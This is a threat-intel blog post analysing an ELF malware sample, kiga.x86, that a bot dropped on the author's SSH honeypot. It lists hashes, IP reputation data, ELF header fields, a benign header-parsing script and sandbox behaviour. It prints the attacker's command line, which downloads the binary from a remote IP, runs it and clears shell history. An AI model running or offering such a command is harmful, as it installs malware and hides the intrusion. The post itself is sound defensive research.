ELF Analysis - kiga.x86

In addition to my weekly threat intel report, I’ll highlight a file/executable/exploit attempt seen in the last week.  I’ll do some basic file analysis to better understand what it is, and what it’s trying to accomplish. Hopefully this can provide contextual data for those doing their own research.

This week we’re looking at kiga.x86. Using various username and password combinations, an IP address from Russia attempted to log in to my ssh honeypot 640 times. I allow the username root with any password, which they used to successfully authenticate 15 times. When logged in, the bot issued one command line, which fetched their payload (kiga.x86), made sure it was executable, ran it, removed the payload from the machine and cleared the cli history. Kiga.x86 is a Linux executable that doesn’t give us much info about its behavior at first glance. Based on execution analysis, it appears to remove and execute programs in the /tmp folder. It could be used to clear other droppers and make sure its payloads are being executed.

Attacker Commands:
wget http://185[dot]172[dot]110[dot]214/AB4g5/kiga[dot]x86; chmod 777 *; ./kiga[dot]x86 Roots;rm -rf kiga[dot]x86; history -c

Filename: kiga.x86
Timestamp: 2020-06-14 05:11PM PST
Initiating Source IP: 93.157.62.102
Downloaded from: http://185[dot]172[dot]110[dot]214/AB4g5/kiga.x86
SHA256: c51dde1933e3c8dee0b1236c7269ce08661f0ef59b6b011e61f26bb7b5706ae1
Virus Total Link: https://www.virustotal.com/gui/file/c51dde1933e3c8dee0b1236c7269ce08661f0ef59b6b011e61f26bb7b5706ae1/detection

File Contents:
file kiga.x86
kiga.x86: ELF 32-bit LSB executable, Intel 80386, version 1 (SYSV), statically linked, stripped

Initiating Source IP Analysis:

Analysis Date: 2020-06-14 22:12:08
Elapsed Time: 3 seconds
Blacklist Status: BLACKLISTED 28/114
IP Address: 93.157.62.102
Reverse DNS: mta23.dealzania.site
ASN: AS43350
ASN Owner: NForce Entertainment B.V.
ISP: NFOrce Entertainment B.V.
Continent: Europe
Country Code: RU (Russia)
Latitude / Longitude: 55.7386 / 37.6068
City: Unknown
Region: Unknown

Download URL analysis:

Analysis Date: 2020-06-14 22:13:10
Elapsed Time: 16 seconds
Blacklist Status: BLACKLISTED 4/114
IP Address: 185.172.110.214
Reverse DNS: Unknown
ASN: AS206898
ASN Owner: Server Hosting Pty Ltd
ISP: Server Hosting Pty Ltd
Continent: Europe
Country Code: NL (Netherlands)
Latitude / Longitude: 52.3824 / 4.8995
City: Unknown
Region: Unknown

Virus Total Stats:
As of 2020-06-14, 31/60 engines detect this file as malicious

Additional properties:
MD5: 7b65dec7862e5fbde95fbeb33e10468b
SHA-1: ec2556fd8052d48376da56ce5abdb22ce12b557d
SHA-256: c51dde1933e3c8dee0b1236c7269ce08661f0ef59b6b011e61f26bb7b5706ae1
Vhash: 7bb8336eb02c878841bb63e512d6698e
SSDEEP: 1536:pvfI8quwTDx27izeXbcziMnEfzwTOEVz3kZIIxYaZH5H5b:1zquSDx22zeXbqEfz+OE5UKI2WHxh
File type: ELF
Magic: ELF 32-bit LSB executable, Intel 80386, version 1 (SYSV), statically linked, stripped
File size: 60.98 KB (62448 bytes)

ELF Info:
Header
Class: ELF32
Data: 2's complement, little endian
Header Version: 1 (current)
OS ABI: UNIX - System V
Object File Type: EXEC (Executable file)
Required Architecture: Intel 80386
Object File Version: 0x1
Program Headers: 3
Section Headers: 10
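As an added example (not code from the original post or from any of the analysis services quoted here), the following Python script decodes the same ELF header fields listed above straight from the raw bytes, and applies the rule `file` uses to call a binary "statically linked" (no PT_INTERP or PT_DYNAMIC program header). It runs on a constructed ELF32 header that mirrors the values reported for kiga.x86, not on the real sample; the function names are mine.

```python
import struct

# Lookup tables for the ELF spec values this report shows (only the ones needed here).
EI_CLASS = {1: "ELF32", 2: "ELF64"}
EI_DATA = {1: "2's complement, little endian", 2: "2's complement, big endian"}
EI_OSABI = {0: "UNIX - System V", 3: "UNIX - GNU/Linux"}
E_TYPE = {1: "REL (Relocatable file)", 2: "EXEC (Executable file)", 3: "DYN (Shared object file)"}
E_MACHINE = {3: "Intel 80386", 40: "ARM", 62: "Advanced Micro Devices X86-64"}
PT_DYNAMIC, PT_INTERP = 2, 3


def parse_elf(data: bytes) -> dict:
    """Decode e_ident and the ELF header, then scan program headers for dynamic-linking markers."""
    if len(data) < 16 or data[:4] != b"\x7fELF":
        raise ValueError("not an ELF file")
    ei_class, ei_data, ei_osabi = data[4], data[5], data[7]
    endian = "<" if ei_data == 1 else ">"  # EI_DATA fixes the byte order of every later field
    if ei_class == 1:    # Elf32_Ehdr / Elf32_Phdr layouts
        ehdr_fmt, phdr_fmt = "HHIIIIIHHHHHH", "IIIIIIII"
    elif ei_class == 2:  # Elf64_Ehdr / Elf64_Phdr layouts
        ehdr_fmt, phdr_fmt = "HHIQQQIHHHHHH", "IIQQQQQQ"
    else:
        raise ValueError("unknown ELF class")
    h = struct.unpack_from(endian + ehdr_fmt, data, 16)
    e_type, e_machine, phoff, phentsize, phnum, shnum = h[0], h[1], h[4], h[8], h[9], h[11]
    # p_type is the first field of a program header in both the 32- and 64-bit layouts.
    p_types = {struct.unpack_from(endian + phdr_fmt, data, phoff + i * phentsize)[0] for i in range(phnum)}
    return {
        "class": EI_CLASS.get(ei_class, "unknown"),
        "data": EI_DATA.get(ei_data, "unknown"),
        "os_abi": EI_OSABI.get(ei_osabi, f"unknown ({ei_osabi})"),
        "type": E_TYPE.get(e_type, f"unknown ({e_type})"),
        "machine": E_MACHINE.get(e_machine, f"unknown ({e_machine})"),
        "program_headers": phnum,
        "section_headers": shnum,
        # `file` reports "statically linked" when no PT_INTERP or PT_DYNAMIC segment is present.
        "statically_linked": not (p_types & {PT_DYNAMIC, PT_INTERP}),
    }


def build_sample_elf32() -> bytes:
    """Constructed stand-in carrying the header values the report lists for kiga.x86; not the real sample."""
    e_ident = b"\x7fELF" + bytes([1, 1, 1, 0]) + b"\x00" * 8  # ELF32, little endian, version 1, SysV ABI
    # e_type=EXEC, e_machine=386, version, entry, phoff=52, shoff, flags, ehsize, phentsize, phnum=3, shentsize, shnum=10, shstrndx
    ehdr = struct.pack("<HHIIIIIHHHHHH", 2, 3, 1, 0x08048000, 52, 0, 0, 52, 32, 3, 40, 10, 7)
    # Three segments as a static binary would have: two PT_LOAD (1) and one PT_GNU_STACK (0x6474e551).
    phdrs = b"".join(struct.pack("<IIIIIIII", t, 0, 0, 0, 0, 0, 5, 4) for t in (1, 1, 0x6474E551))
    return e_ident + ehdr + phdrs
```

Running `parse_elf(open(path, "rb").read())` on a real file gives the same fields readelf and VirusTotal show, which is a quick way to triage a stripped, statically linked sample before spending sandbox time on it.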

Windows Defender:

Example actions:
Processes Terminated
When executing the file being studied, the following processes were terminated.

  • /tmp/EB93A6/996E.elf
  • /lib/systemd/systemd-udevd --daemon

Tencent Analysis:

SHA256: c51dde1933e3c8dee0b1236c7269ce08661f0ef59b6b011e61f26bb7b5706ae1
File type: ELF32

Process

Behaviour: Execute a file
Detail info: execve: /tmp/bin/****.elf
Behaviour: Process exit
Detail info: procexit status=256 procexit status=136 procexit status=0

Network

Behaviour: connect
Detail info: connect: 192.168.0.**:60869->8.8.8.8:domain
Behaviour: socket
Detail info: socket: domain=2(AF_INET) type=2 proto=0 socket: domain=2(AF_INET) type=1 proto=0
